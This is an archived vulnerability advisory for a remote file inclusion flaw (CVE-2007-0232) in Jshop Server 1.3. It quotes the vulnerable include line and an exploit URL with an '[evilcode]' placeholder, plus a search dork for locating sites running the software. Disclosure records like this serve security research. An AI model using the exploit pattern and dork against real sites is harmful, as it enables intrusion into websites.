Bug: Jshop Server 1.3 ( Ascii Version )

Search:
WLB2

Jshop Server 1.3

Published
Credit
Risk
2007.01.17
irvian
High
CWE
CVE
Local
Remote
N/A
CVE-2007-0232
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

========================================================================
==
# scripts : Jshop Server 1.3
# Discovered By : irvian
# script : http://www.jshop.co.uk/
# Thanks To : #hitamputih #nyubicrew #patihack
# special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork : powered by Jshop
------------------------------------------------------------------------
--
file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");

exploit : http://www.target.com/routines/fieldValidation.php?jssShopFileSystem=[ev
ilcode]

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version